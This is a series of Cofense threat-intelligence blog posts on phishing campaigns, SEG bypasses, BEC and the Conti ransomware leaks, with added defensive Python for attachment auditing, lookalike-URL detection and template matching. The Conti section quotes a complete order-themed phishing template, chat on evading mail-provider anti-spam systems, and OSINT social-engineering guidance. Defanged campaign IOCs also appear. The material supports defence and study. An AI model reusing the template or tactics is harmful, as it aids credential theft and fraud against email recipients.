SEG Effectiveness: Three Takeaways from the 2022 State of Phishing Report

Author: Tonia Dudley

Earlier this year, Cofense released its 2022 Annual State of Phishing Report highlighting insights and analysis seen in customer environments. One major takeaway was the volume of phish that continue to bypass Secure Email Gateways (SEGs). To provide more insight on this topic, Cofense CTO & Co-Founder Aaron Higbee and I sat down to go in depth and highlight findings on SEG misses.

While organizations analyze data across industries to see how they compare against peers, we also recommend you compare your organization against your technology stack. As you tune your security controls and SEG, are you able to detect and respond to new threats as they land in the inbox?

Figure 1: New Behavior for QakBot

Key Takeaway #1: Threat Actors tune their tactics.

As SEGs tune for file attachment threats, which continue to show low inbox hits, Cofense continues to see new file attachment types used to bypass the SEG. These odd file types may look obscure to a user browsing their inbox, but they are often still recognized and opened natively by Microsoft Windows endpoints. Along with odd file types, we stay abreast of new behavior tactics used by threat groups. The email in Figure 1 is related to the known QakBot malware family, but this particular campaign switched tactics by directing the recipient to click a link that downloads a zip file. When the recipient opens this zip file and extracts the .MSI inside it, QakBot is launched onto the device.

Key Takeaway #2: The top file attachment type landing in the inbox.

Threat actors continue to leverage the one file type they know will land in the inbox and likely get engagement from the recipient – HTML / HTM files. This file type is difficult to mitigate with a hard block because many legitimate business applications and SaaS solutions send it. Look for ways to mitigate the risk by working with business owners to identify the recipient population that needs to receive these emails, then provide resources that let those users validate the legitimate services that send this file type. The best way to condition and prepare your organization to identify and report this threat is to use this file type in a simulated phishing campaign.

Key Takeaway #3: Microsoft updated Office file types – did you?

Not only are odd file types being leveraged, but what about file types that have been sunset? I don’t know about you, but I’m not sure when I last used an MS Office product that didn’t add the ‘x’ to the file extension (.xlsx or .docx). Adding these legacy extensions to your block list can be a simple configuration change that minimizes the risk of these files landing in the inbox.
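The three takeaways above are all attachment-policy questions: which odd Windows-native types, which HTML/HTM attachments and which legacy (non-‘x’) Office types are reaching the inbox. The following is an added example, not Cofense code from the post, of how a defender can audit reported .eml files against such a policy; the extension lists are my own selection for the example, and the sample message, its addresses and attachment bytes are constructed inline.

```python
import email
import posixpath
from email import policy
from email.message import EmailMessage

# Extension policy buckets. These lists are this example's assumption, not a Cofense block list.
LEGACY_OFFICE = {".doc", ".dot", ".xls", ".xlt", ".xla", ".ppt", ".pps", ".pot"}
HTML_TYPES = {".html", ".htm", ".shtml", ".xhtml", ".mht", ".mhtml"}
WINDOWS_NATIVE_ODD = {".msi", ".iso", ".img", ".vhd", ".vhdx", ".lnk", ".js", ".jse", ".vbs", ".wsf", ".hta"}


def classify_attachment(filename):
    """Map a filename to a policy bucket. Only the final extension counts,
    so a double extension such as 'invoice.pdf.html' is judged as HTML."""
    ext = posixpath.splitext(filename.lower())[1]
    if ext in LEGACY_OFFICE:
        return "legacy-office"
    if ext in HTML_TYPES:
        return "html"
    if ext in WINDOWS_NATIVE_ODD:
        return "odd-type"
    return "other"


def audit_eml(raw_bytes):
    """Parse a raw RFC 5322 message and return (filename, bucket) for each
    attachment that lands in a policy bucket, in the order the parts appear."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        bucket = classify_attachment(name)
        if bucket != "other":
            findings.append((name, bucket))
    return findings


def build_sample_eml():
    """Constructed test message: the addresses and attachment contents are made up."""
    msg = EmailMessage()
    msg["From"] = "orders@supplier.example"
    msg["To"] = "ap-team@company.example"
    msg["Subject"] = "Your order documents"
    msg.set_content("Please review the attached documents.")
    msg.add_attachment(b"<html><body>fake login form</body></html>",
                       maintype="text", subtype="html", filename="transcript.html")
    msg.add_attachment(b"\xd0\xcf\x11\xe0 constructed legacy OLE header",
                       maintype="application", subtype="msword", filename="invoice_0422.doc")
    msg.add_attachment(b"%PDF-1.4 constructed",
                       maintype="application", subtype="pdf", filename="statement.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, bucket in audit_eml(build_sample_eml()):
        print(f"{bucket:14s} {name}")
```

Running this on the constructed message reports transcript.html as html and invoice_0422.doc as legacy-office while leaving the PDF alone; pointing audit_eml at the .eml files exported from reported emails gives a quick measure of which policy buckets are actually reaching inboxes past the SEG.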

As we closed out the discussion on odd file types and opened the floor for questions, we received a question that has been a discussion point lately as organizations are looking to focus their phishing defense programs.

What are you using to measure the effectiveness of your phishing defense program?

Tune into the recording for our summary and stay tuned as we publish more recommendations on this topic.

Threat actors are continuing to use emerging tactics and techniques to bypass traditional email security solutions and the only way to stay ahead of the curve is to have a comprehensive phishing defense strategy. If you’re interested in a more detailed analysis of SEG effectiveness, BEC insights or catching ransomware at the phishing stage, sign up for our upcoming webinars.

Hackers Utilize SwissTransfer To Deploy Phishing Scam

Author: Kian Maher

In recent weeks, the Cofense Phishing Defence Center (PDC) has noted a number of emails utilising the SwissTransfer service to achieve successful phishes against recipients. File sharing services such as WeTransfer, Microsoft OneDrive and Dropbox are a common and preferred vector for attackers, and have been used to spread files containing anything from scams to malware leading to ransomware.

Figure 1: Phishing Email

Based in Switzerland, this file sharing service has been seen mostly in attacks against users of German speaking nations. The file sharing capabilities and clean image of the site can easily trick a user into downloading a file they believe is legitimate and from a known contact; however, with the ability to add any alias to a sent file, impersonation becomes exceedingly easy.

Navigating to the link on the email will present the user with a legitimate SwissTransfer download page where a PDF file named “Portfolio Control GmbH.pdf” can be downloaded by the user, as seen in Figure 2.

Figure 2: File Download Page

Once the file has been downloaded, and the recipient opens the PDF, clicking on the link will redirect the user to a Microsoft login page.

Figure 3: PDF Document

The login page spoofs the standard Microsoft layout and the only indicator that something is amiss is the URL seen in the address bar.

Figure 4: Landing Page

Beware of emails coming from legitimate services such as SwissTransfer, WeTransfer and Microsoft OneDrive, as phishing attacks are constantly evolving and are becoming more convincing and complex by the day. Equally important is to ensure the same password is never used for more than one account. Additionally, never perform any password resets or account retrievals outside of the legitimate website of any email provider you use, or outside of a corporate environment’s approved methods.

Malicious emails like this are a constant threat in the enterprise space due to the constant use of services such as Microsoft Outlook, and it is important that users are made aware of this so that they can be more vigilant when receiving emails. With the Cofense suite of products and services, malicious emails can be identified, and indicators of compromise (IOCs) extracted and shared. Find out what we can do for your enterprise.

Indicators of Compromise (IOC) and associated IPs:

IOC: hXXps://www[.]swisstransfer[.]com/d/3835eb76-db5c-4e5a-9aa6-044bac8b46ce | IP: 185.125.25.5
IOC: hXXps://microsoftonline[.]gonset-holdings[.]ch/common/oauth2/v2.0/authorize | IP: 190.123.44.153
IP: 64.98.145.30
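The post notes that the only visible giveaway on the spoofed login page is the URL in the address bar, and the listed landing-page indicator mimics the real Azure AD OAuth path (/common/oauth2/v2.0/authorize) under a non-Microsoft domain. The following is an added example, not part of the post or Cofense tooling, of a triage check for that pattern: it refangs an indicator, then asks whether the hostname is a genuine Microsoft sign-in domain and whether the hostname or path borrows Microsoft branding. The allowlist, brand tokens and path markers are my assumptions for the example; the attacker.example URL is constructed.

```python
from urllib.parse import urlparse

# Registered domains Microsoft uses for sign-in; treating this short list as complete
# is this example's assumption and a real deployment would maintain its own.
MICROSOFT_DOMAINS = ("microsoftonline.com", "microsoft.com", "live.com", "windows.net",
                     "office.com", "office365.com", "outlook.com", "sharepoint.com")
# Brand strings an impersonation page tends to put in its hostname
BRAND_TOKENS = ("microsoft", "office365", "outlook", "sharepoint", "onedrive")
# Path fragments copied from the real Azure AD sign-in endpoint layout
OAUTH_PATH_MARKERS = ("/oauth2/", "/authorize", "/login.srf", "/common/")


def refang(url):
    """Turn a defanged indicator (hXXps, [.]) back into a parseable URL."""
    return (url.replace("hXXp", "http").replace("hxxp", "http")
               .replace("[.]", ".").replace("[:]", ":"))


def is_microsoft_host(host):
    # Exact match or a subdomain of an allowlisted domain. A plain substring test
    # would be fooled by hostnames such as login.microsoftonline.com.attacker.example
    return any(host == d or host.endswith("." + d) for d in MICROSOFT_DOMAINS)


def assess_login_url(indicator):
    """Classify a (possibly defanged) URL by how strongly it imitates a Microsoft login."""
    parsed = urlparse(refang(indicator))
    host = (parsed.hostname or "").lower()
    path = parsed.path.lower()
    if is_microsoft_host(host):
        return "legitimate-microsoft-host"
    brand_in_host = any(t in host for t in BRAND_TOKENS)
    oauth_like_path = any(m in path for m in OAUTH_PATH_MARKERS)
    if brand_in_host and oauth_like_path:
        return "lookalike: Microsoft brand in hostname plus Microsoft-style OAuth path"
    if brand_in_host:
        return "suspicious: Microsoft brand string in a non-Microsoft hostname"
    if oauth_like_path:
        return "suspicious: Microsoft-style OAuth path on an unrelated host"
    return "no Microsoft login cues"


# The two defanged indicators quoted in the post, plus two constructed comparison URLs
SAMPLE_URLS = [
    "hXXps://www[.]swisstransfer[.]com/d/3835eb76-db5c-4e5a-9aa6-044bac8b46ce",
    "hXXps://microsoftonline[.]gonset-holdings[.]ch/common/oauth2/v2.0/authorize",
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize",
    "https://login.microsoftonline.com.attacker.example/common/oauth2/v2.0/authorize",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{assess_login_url(url):75s} {url}")
```

The suffix comparison in is_microsoft_host is the part worth keeping even if the rest is replaced: the fourth sample URL contains the full legitimate hostname as a prefix and still classifies as a lookalike, which is exactly the trick a user reading the address bar is likely to miss.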

Cofense Earns 2022 Top Rated Award from TrustRadius

Cofense PhishMe recognized for Security Awareness Training category based on excellent customer satisfaction ratings

Leesburg, Va. – May 19, 2022 – Cofense®, the leading provider of Phishing Detection and Response (PDR) solutions, today announced that Cofense PhishMe™ has won a 2022 Top Rated Award by TrustRadius in the security awareness training software category. Top Rated awards help distinguish products that have excellent customer satisfaction ratings and are based entirely on end user reviews.

Current events highlight that mature and effective phishing defense programs must be proactive and constant, as phishing continues to be a key entry point for a majority of cyber attacks. As employees are the front line of defense against phishing, training for employees is one of the most effective ways to strengthen your company’s defense against attacks such as ransomware, malware and Business Email Compromise (BEC). When it comes to preparing and conditioning users to spot and report phish hitting their inbox, the 2022 Cofense Annual State of Phishing Report highlighted a two-point increase in resiliency rate for simulation campaigns and saw a seven-point resiliency rate among organizations that have full phishing defense programs.

“Email threats are not going anywhere. In fact, it’s quite the opposite; they’re only getting worse and continue to dominate as the primary vector behind most data breaches. Threat actors are continuing to use emerging tactics and techniques to bypass email security technologies and the only way to stay ahead of the curve is to have a comprehensive email defense strategy,” said Rohyt Belani, CEO of Cofense. “An effective email defense program operates at the intersection of human intelligence and artificial intelligence. A critical mass of vigilant humans who report suspicious emails are critical to feed machine learning powered technologies so the latter can continually evolve and create a self-healing email security system. Security training or email security technologies in isolation are not going to work.”

Cofense PhishMe, a SaaS platform trusted by over 2,500 organizations across multiple industry verticals, uses intelligent automation, advanced algorithms and active threat scenarios to reinforce positive security awareness behavior. The training brings real, active threats into realistic phishing scenarios to ensure program relevance and to provide users with insights that can help them to navigate the modern threat landscape.

To qualify for a Top Rated award, a product must have 10 or more recent reviews from the past year, a trScore of 7.5 or higher based on TrustRadius’ algorithm that calculates a product’s scores based on a weighted average of reviews and ratings, and show relevance by having earned at least 1.5% of the site traffic in the category. Cofense’s TrustRadius reviews can be viewed here.

To learn more about Cofense, please visit www.cofense.com.

About Cofense

Cofense® is the leading provider of phishing detection and response solutions. Designed for enterprise organizations, the Cofense Phishing Detection and Response (PDR) platform leverages a global network of over 32 million people actively reporting suspected phish, combined with advanced automation to stop phishing attacks faster and stay ahead of breaches. When deploying the full suite of Cofense solutions, organizations can educate employees on how to identify and report phish, detect phish in their environment and respond quickly to remediate threats. With seamless integration into most major TIPs, SIEMs, and SOARs, Cofense solutions easily align with existing security ecosystems. Across a broad set of Global 1000 enterprise customers, including defense, energy, financial services, healthcare and manufacturing sectors, Cofense understands how to improve security, aid incident response and reduce the risk of compromise. For additional information, please visit www.cofense.com or connect with us on Twitter and LinkedIn.

Phishing Takeaways from the Conti Ransomware Leaks – Part 3

Author: Brad Haas

Conti is one of the most prolific ransomware operations in the threat landscape today. In a recent act of retaliation against Conti’s leaders for their support of Russia, an anonymous person leaked documentation and internal chat logs from the group. This blog post series covers important phishing-related takeaways Cofense Intelligence analysts discovered in the leaks. In Part 3, we discuss elements of Conti’s phishing tactics and strategy.

Conti Produces Semi-Random Phishing Templates Using Simple Themes

Although the Conti group employs other malware operators to perform the work of sending malicious emails, it appears that the group provides the templates to use in the emails. Several English-language templates were included in the leaked Jabber chats, indicating a system that randomly chooses words or phrases from short lists. The templates included text that could produce a variety of wordings for email subject lines and bodies, along with a list of attachment names to choose from. Conti member “Lemur” contributed the following order-themed template in October:

lemur:

{Greetings|Hello|Good day|Good afternoon}{!|,|}

{Thank you for|We are grateful for|We are grateful for|Many thanks for} {your|your recent} {online order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} TRANSFER NUMBER. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}.

{Total|Full|Whole} {order|purchase|payment} SUM

You {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} CHECK NUMBER {in|in the} {attached file|file attached}.

{Thank you!|Have a nice day!}

Subjects: Your {order|purchase|online order|last order} Purchase order number payment {processed|obtained|received}

Attachments:

ord_conf

full.details

compl_ord_7847

buyer_auth_doc

info_summr

customer_docs

spec-ed_info

Dozens of other templates appeared in the chat, with themes including invoices, shipping, payment processing, legal matters, and other business-centered subjects. In a TrickBot chat exchange, two team members discussed a more personal template impersonating a woman looking for a relationship. They went through several revisions, even incorporating feedback from an English teacher.
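The template above is spintax: each {a|b|c} group is one slot filled by a random pick, and the ALL-CAPS words (TRANSFER NUMBER, SUM, CHECK NUMBER) are values the sender fills in per message. For a defender, a leaked template is a detection asset, because every message the generator can produce matches one regular expression derived from it. The following is an added example, not code from the post or from Conti, that compiles the quoted body template into such a pattern, counts how many distinct bodies it can yield, and matches reported email text against it. Reading the ALL-CAPS tokens as fill-in slots is my interpretation; the sample phish and legitimate order bodies are constructed.

```python
import re
from math import prod

# Body portion of the order-themed template quoted in the post, used here as the detection input
CONTI_ORDER_TEMPLATE = """{Greetings|Hello|Good day|Good afternoon}{!|,|}

{Thank you for|We are grateful for|We are grateful for|Many thanks for} {your|your recent} {online order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} TRANSFER NUMBER. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}.

{Total|Full|Whole} {order|purchase|payment} SUM

You {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} CHECK NUMBER {in|in the} {attached file|file attached}.

{Thank you!|Have a nice day!}"""

SPIN_GROUP = re.compile(r"\{([^{}]*)\}")
# ALL-CAPS tokens are treated as per-message fill-in slots (assumption about the template's meaning)
PLACEHOLDER = re.compile(r"\b[A-Z]{2,}(?: [A-Z]{2,})*\b")


def words_to_regex(text):
    """Escape literal words and allow any run of whitespace (including newlines) between them."""
    return r"\s+".join(re.escape(w) for w in re.split(r"\s+", text))


def literal_to_regex(text):
    """Literal text outside braces; each fill-in slot becomes a lazy wildcard."""
    out, pos = [], 0
    for m in PLACEHOLDER.finditer(text):
        out.append(words_to_regex(text[pos:m.start()]))
        out.append(r"\S.*?")
        pos = m.end()
    out.append(words_to_regex(text[pos:]))
    return "".join(out)


def spintax_to_regex(template):
    """Compile a spintax template into one regex that matches every expansion of it."""
    out, pos = [], 0
    for m in SPIN_GROUP.finditer(template):
        out.append(literal_to_regex(template[pos:m.start()]))
        options = "|".join(words_to_regex(o) for o in m.group(1).split("|"))
        out.append(f"(?:{options})")
        pos = m.end()
    out.append(literal_to_regex(template[pos:]))
    return "".join(out)


def variant_count(template):
    """Number of distinct texts the template can produce (a repeated option still counts once per slot pick)."""
    return prod(len(m.group(1).split("|")) for m in SPIN_GROUP.finditer(template))


def matches_template(template, body):
    """True when the body contains an expansion of the template (extra text around it is allowed)."""
    return re.compile(spintax_to_regex(template), re.DOTALL).search(body) is not None


# Constructed message bodies: one that the template could have generated, one ordinary order notice
SAMPLE_PHISH = """Hello,

Many thanks for your recent purchase order. Our team has processed your advance payment TR-48812. Now we begin to prepare your order. Your parcel will be delivered to your residence within five business days.

Full payment 1,240.00 USD

You will find all order and payment details and your receipt 00417 in the attached file.

Have a nice day!"""

SAMPLE_LEGIT = "Hi Jane,\n\nYour order #1234 has shipped and should arrive in 3-5 business days.\n\nThanks,\nThe Store"

if __name__ == "__main__":
    print("variants:", variant_count(CONTI_ORDER_TEMPLATE))
    print("phish matches:", matches_template(CONTI_ORDER_TEMPLATE, SAMPLE_PHISH))
    print("legit matches:", matches_template(CONTI_ORDER_TEMPLATE, SAMPLE_LEGIT))
```

The variant count shows why keyword-only blocking is a poor fit for this kind of template (hundreds of billions of possible bodies from one short template), while the compiled pattern identifies all of them at once; in practice it belongs in a retro-hunt over reported or quarantined mail rather than in an inline gateway rule, since any edit to the template by the operators breaks an exact structural match.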

Conti Actively Develops and Tests Email Delivery Tactics

The spammers who work in and with the Conti organization showed familiarity with automated defenses against malicious email campaigns. In November 2021, “wind” discussed a way to abuse browser-centric email providers to send malicious emails:

wind: […] it will be necessary to create thousands of such docker containers and send only 10 letters from each mail account, sent by an AI emulator with mouse movements simulating human ones. Every mailer now has an AI, it recognizes all the movements in the browser, and their AI will just laugh out loud at the get requests to send hundreds of thousands of emails.

Another message from April 2021 shows an operator testing their emails on webmail platforms Gmail, Yahoo, Outlook, Mail.com, and AOL Mail. They included screenshots showing that an Apple-spoofing email had arrived in each of the inboxes.

A test of an Apple-spoofing email in a Mail.com inbox. The inbox includes several other test emails.

Phishing is Central to Conti’s Attack Strategy

Conti operators consider humans to be an effective target, and phishing is their mechanism for exploiting the human target surface with social engineering. Their “Hacker’s Quick Start” document lists dozens of OSINT sources to use, singling out people as “the weakest link.” The reference to “previously opened networks” indicates a repository of already-compromised data that can be leveraged against new targets.

Next, we look for the weakest link (see below).

Social engineering requires knowledge of personalities.

Everything is important: phone numbers, place of residence, dog’s name, hometown, favorite color, favorite band, hobbies.

Of particular importance: your candidate’s personal network of contacts, especially business contacts.

The structure of organizations reflects the structure of society.

As you move from one person to another through a network of contacts, you can change your entry point within one network, or open up new networks.

Both OSINT intelligence tools are used to gather information, and information found in previously opened networks about contacts (Outlook address books, correspondence, etc.).

[…]

This data is then used either through phishing emails or phone calls.

In both cases, the load is triggered by a person.

Some of our previous takeaways highlight Conti operators’ consistency in dropping ineffective tactics and persisting with effective ones:

• TrickBot was effective enough for them to enjoy a tremendous amount of success early on, but when it started to cause too many problems, they shifted to other malware families.

• Despite all the attention, they used the BazarCall campaigns, knowing that the invoice theme would likely continue to succeed.

• They went to the trouble of bringing Emotet back, likely because it had been such a significant source of infections for them prior to its takedown.

This pragmatic approach accentuates the value that ongoing phishing activity must be providing to Conti operations. Given all of Conti’s investment in OSINT, email operations, and reviving Emotet distribution, phishing is clearly one of the group’s most important tactics, and it will likely be a staple for the group in the foreseeable future.

For more insights on Conti ransomware operations:

Phishing Takeaways from the Conti Ransomware Leaks – Part 1

Phishing Takeaways from the Conti Ransomware Leaks – Part 2

5 Tips to Thwart Business Email Compromise (BEC) Attacks

Author: Ronnie Tokazowski

For the 7th year in a row, Business Email Compromise (BEC) is the number one cybercrime, as reported by losses, according to the FBI IC3 Report. Topping in at an astonishing $43 billion dollars with victims in 177 countries and money being wired between 140 different countries, it still amazes me that people are more concerned about ransomware and nation-state attacks instead of murderous BEC actors killing in the name of evil spirits.

To add insult to injury, the same actors behind BEC are responsible for $100 billion in SBA fraud and $80 billion in paycheck protection plan (PPP) fraud. This doesn’t even begin to touch the dozens of consumer-based crimes such as check fraud, advanced-fee fraud, or romance scams, with over $223 billion now tied back to the exact same scammers.

And that’s just what we know.

Reflecting on seven years of tracking BEC, there’s one major thing that organizations fail to do. It has nothing to do with a shiny box, and nothing to do with buying or selling a service. It’s literally reviewing what you already have.

Here’s your BEC checklist that will mitigate 80% of attacks:

  • Review your financial processes and procedures
  • Define how wire transfers, gift card purchases, and direct deposit requests work
  • Once defined, communicate & follow the process

Most BEC attacks are successful simply because a process breaks down. Someone wired money without checking if they should, a random phone number led to gift cards being sent out, or HR made a one-time exception to update payroll via email instead of pointing employees back to employee portals. The 80% solution to mitigating many types of BEC attacks is simple: review your processes around how wire transfers, authorizations to vendor master bank account updates, money orders, gift cards, and invoices are to be paid and follow them.

Here are five tips to get you started on which processes need to be updated:

  1. Maintain a list of known and trusted phone numbers to verify wire transfer requests.
  2. Don’t accept payroll update requests via email. Point users to employee portals to make the changes there.
  3. Establish a gift card purchasing process, and if no one needs to purchase gift cards for the company…then no one purchases gift cards.
  4. Bank accounts rarely change, so clearly define what bank accounts can be used at the beginning of any business relationship. If an account needs to be changed and updated, who is responsible for verifying the new account with an external party? Implement a freeze period to the account update to ensure the bank can verify ownership details.
  5. What is the process for wiring $10,000 / $50,000 / $100,000+ dollars out of the organization? Define and follow a multi-person process to verify transactions before money gets lost.

While updating processes won’t cover every single BEC use case, a vast majority of attacks can be thwarted with these simple changes. Is it better to take a week to do the boring work of reviewing your processes and procedures or be an unhappy part of the $223 billion dollar statistic?

If you want to learn more about BEC statistics that we observed in 2021, as well as ways to mitigate this attack, sign up for our next webinar focused solely on BEC attacks.

10 Enhancements to the Cofense Triage and ServiceNow Security Incident Response Integration

Is phishing still keeping you up at night?

Do disparate systems and switching screens to analyze and respond to phishing frustrate you?

Or, what about excessive phishing alerts that could be better solved through automation?

Over a year ago, Cofense built an integration with ServiceNow® Security Incident Response (SIR). The purpose: integrate Cofense Triage™ and ServiceNow SIR to create security incidents in SIR and allow an analyst to analyze and investigate employee-reported suspicious emails in either platform. The integration was well-received for the first version, and since then, Cofense Triage has added new capabilities that have been extended to ServiceNow SIR.

Creating a security incident at the cluster level, responding to reporters, and downloading email artifacts are just a few of the features that have been added to the next version of the integration, and then some!

Mutual customers operating Cofense Triage 1.24 can integrate with ServiceNow’s Quebec, Rome, or San Diego releases.

The foundation of the integration is still the same.

  • Configure authentication (Triage Host, Client ID, Client Secret, and MID Server (optional))
  • Define the incident criteria that create an SIR entry in ServiceNow.

Incident Criteria Configuration to Create Entries in SIR

Let’s look at the 10 enhancements built into this integration.

1. Clusters: Create security incidents based on cluster criteria

Cofense Triage clusters multiple reported emails. ServiceNow can then ingest clusters based on criteria and create one security incident per cluster. For example, 5 reported emails bound to one Cofense Triage cluster can create one security incident in ServiceNow SIR.

Security Incident Created from a Cluster

2. Reports: Ingest reports associated with clusters

When multiple reports are present in a cluster, analysts can choose to fetch all the reports from the cluster. Each report carries its relationship with the cluster and the SIR record.

Fetched Reports Associated with a Cluster and Linking to SIR

3. Emails: Download reported emails as .eml files

Want to add the original email to the SIR? ServiceNow can download the full email(s) as .eml

Report Downloaded as .eml File

4. Attachments: Download attachments from reported emails

Attachments can be downloaded on demand and packaged into the SIR for additional analysis and research.

Download Attachment Capability for Additional Analysis

5. Relationships: Links between security incident and other reports

In addition to getting all reports, SIR will link and show the relationship between a cluster and reports.

Fetched Reports Linking to SIR

6. Execute Playbooks to: Categorize reports

Execute a playbook to categorize reports, single or multiple, from a cluster within ServiceNow SIR.

Categorize Reports as Malicious or Non-Malicious

7. Execute Playbooks to: Respond to Reporters and teams/groups

It’s important to keep reporters informed so that they continue to report suspicious emails that evade SEGs. Choose from various notification templates ingested from Cofense Triage into SIR so that specific responses can be sent to reporters and cybersecurity and IT team members.

Response to Reporters and Team Members

8. Execute Playbooks to: Apply tags to reports

When executing a playbook, tag reports in Triage to help security analysts keep track of various reports and workflow being conducted.

Add Tags When Processing and Executing Playbooks

9. Comments: Get comments from reports

Cofense’s Managed Phishing Detection and Response service uses report comments that provide clients with other threat indicators associated with a reported email. These are typically indicators that are not visible in the email, but if clicked, redirect to other nefarious sites or link to more malware.

Sample Comments with Other Indicators From Reported Email

10. Threat Indicators: Get more threat indicators from reports

Analysts designating threat indicators across URLs, domains, and attachments in Cofense Triage can set them to Malicious, Suspicious, or Benign. ServiceNow will ingest these indicators for use in additional operational workflows. Additionally, other observables in Cofense Triage, such as headers, also populate SIR’s observable table.

Suspicious Hash Threat Indicator Finding

Benign Domain Threat Indicator Finding

Malicious URL Threat Indicator Finding

Cofense Triage and ServiceNow SIR are more tightly integrated to allow security teams to create a unified workflow that leverages the power of both platforms. By determining criteria to create an incident, security teams can ingest, prioritize, and close security incidents without flipping back and forth between screens.

Phishing Takeaways from the Conti Ransomware Leaks – Part 2

Author: Brad Haas

Conti is one of the most prolific ransomware operations in the threat landscape today. In a recent act of retaliation against Conti’s leaders for their support of Russia, an anonymous person leaked documentation and internal chat logs from the group. This blog post series covers important phishing-related takeaways Cofense Intelligence analysts discovered in the leaks. In Part 2, we discuss Conti’s collaboration with other malware groups, as well as their reaction to scrutiny from security researchers.

Conti-Emotet Link Cemented

When Emotet resurfaced in November 2021, some cybersecurity researchers reported that it was at the behest of Conti leadership. The leaked Conti logs confirm the collaboration, as Emotet’s primary operator was present in Conti chats using the alias “Veron” and in TrickBot forum chats as “Aron.” An exchange from the TrickBot forum chat establishes his identity:

[14.01.22 10:08:50] angelo: who is Veron ?

[14.01.22 10:09:07] manuel: veron )) Well, he’s [Emotet]

[…]

[14.01.22 10:09:58] angelo: but [Emotet]

[14.01.22 10:10:11] angelo: I thought it was aron

[…]

[14.01.22 10:11:33] manuel: yes in our [chat] it is

On February 24, 2021—less than a month after the law enforcement takedown of Emotet—Conti members discussed his joining them:

stern: Is veron up and running?

bentley: He starts in March.

Veron was active in the chat starting in early March 2021, with many messages corroborating cybersecurity reporting on Emotet activity and its cooperation with Conti. For example, on November 23 he discussed the use of Windows App Installer packages as a delivery mechanism. Within a week, Emotet emails started to include links to those packages.

Starting in December, Emotet occasionally installed Cobalt Strike payloads, which matches Conti’s tactics. This represents a combination of two very significant phishing threats: Emotet’s massive installation base and email sending power could give Conti operators access to more victims than ever.

TrickBot is Virtually Defunct, Superseded by BazarBackdoor and Emotet

Like Emotet, TrickBot started as a banking trojan, but evolved to a more general-purpose malware family serving other groups. Conti operators used it heavily, but found that it had unnecessary features that increased risk of detection by target organizations. In May 2021, high-ranking Conti member “Stern” suggested trimming away the extra functionality:

stern: let’s modify the trick, remove the excess

stern: we don’t really need the admin logpost etc.

In the same conversation, he highlighted that its role was to enable Conti operators to explore a target network using Cobalt Strike:

stern: he says that bots don’t connect, and if they do, it’s hard to bring them to cobalt later

In a later exchange, “Mango” expressed difficulty getting a prospective team member to work with it.

mango: they’re ready. i offered them a job on trick.

mango: they said that trick is dirty s*** that no one supports

mango: I justified myself as best I could, but it’s hard to argue, of course

TrickBot has been virtually absent from the phishing threat landscape since Emotet started sending email again in November 2021. Based on frequent mentions in the chat logs, Conti operators favored BazarBackdoor as an alternative. Emotet’s major growth in February 2022 also likely provides Conti with ample opportunities to replace the functionality provided by TrickBot.

Conti Actors Stick With Effective TTPs Despite Public Scrutiny

One of the leaked internal documents is a “Hacker’s Quick Start” guide, with basic guidance concerning all aspects of Conti operations. It ends with a note instructing new employees to pay attention to the work of cybersecurity researchers, but not to let it discourage them:

Analyzing open sources about your activities is important: you will know the part of the tricks that have already been uncovered, and therefore they have become ineffective.

However, you do not know the part of the tricks that have not been disclosed. For the sake of this, the adversary may launch disinformation, concealment, and deception.

Chat logs and real-world Conti activity show that the group takes this advice seriously. In April 2021, Cofense reported on new BazarBackdoor campaigns (also called “BazarCall”) that used unique tactics, including the use of a telephone call center. Other cybersecurity researchers picked up the story as well, including one who recorded his phone conversation and published it on YouTube. Conti members noticed the attention, but didn’t believe it would impact their operations:

derek: here’s more interesting stuff – [researcher] called us, it shows all how the infection looks https://www.youtube.com/watch?v=uAkeXCYcl4Y

stern: hi, great

derek: but I think it won’t affect the job much as the invoice theme is still alive and guys are still just spamming and making bots

Later in the year, they did proceed with using BazarCall to deploy their ransomware, despite the published research. DFIR Report researchers showed how a BazarCall campaign followed the Conti playbook: it installed TrickBot, which collected information and then executed Cobalt Strike. Within three days, the threat actors had gained sufficient access to execute Conti’s ransomware across the domain.

Similarly, despite the leaks’ exposure of a massive amount of internal chats and information, Conti is still moving forward with ransom operations. On March 15, 2022, they announced another victim on their public website.

Up Next

This blog series will conclude with Part 3, which will cover more of Conti’s phishing strategy and tactics. If you missed the first blog in this series, we discussed the background of the leaks, Conti’s segmentation of the attack chain, and how Conti operators use OSINT to select and harass their targets.

Energy/Infrastructure Enterprises Targeted by HTML Phishing Campaign

By Matthew Dortch, Cofense Phishing Defense Center

Commonly used, yet still effective, tactics are being exploited by threat actors to get phish into users’ email inboxes. The Cofense Phishing Defense Center (PDC) has observed a phishing campaign targeting energy/infrastructure companies by utilizing HTML attachments containing credential-stealing forms. This is another example of how Cofense observes phishing campaigns across various customers and industries.

Figure 1: Email Body

The email shown in Figure 1 poses as a notification that a file, presented as a transcript, has been legitimately received. The threat actor leveraged a simple transcript alert theme. Specific details added to the email, such as the date and time the attachment was received, may boost the perceived authenticity of the phish. To appear to come from an internal source, the threat actor spoofed the organization by using “Shared-Files via ”; however, the actual email address, with a Japanese domain, is still clearly displayed.

Figure 2: Phishing Page

After downloading and opening the HTML file, users are shown a Microsoft login form with some kind of document displayed behind it, as shown in Figure 2. The document behind appears to be an invoice with financial information that can supposedly only be accessed by logging in with a Microsoft account. This mismatch alone was most likely an indicator to the recipient that the email content didn’t align with what was being presented on the landing page, leading them to quickly report the suspicious email. The recipient’s email address is displayed automatically, with only the password field empty, because the threat actor scripted the HTML file to pre-populate the recipient’s email address.
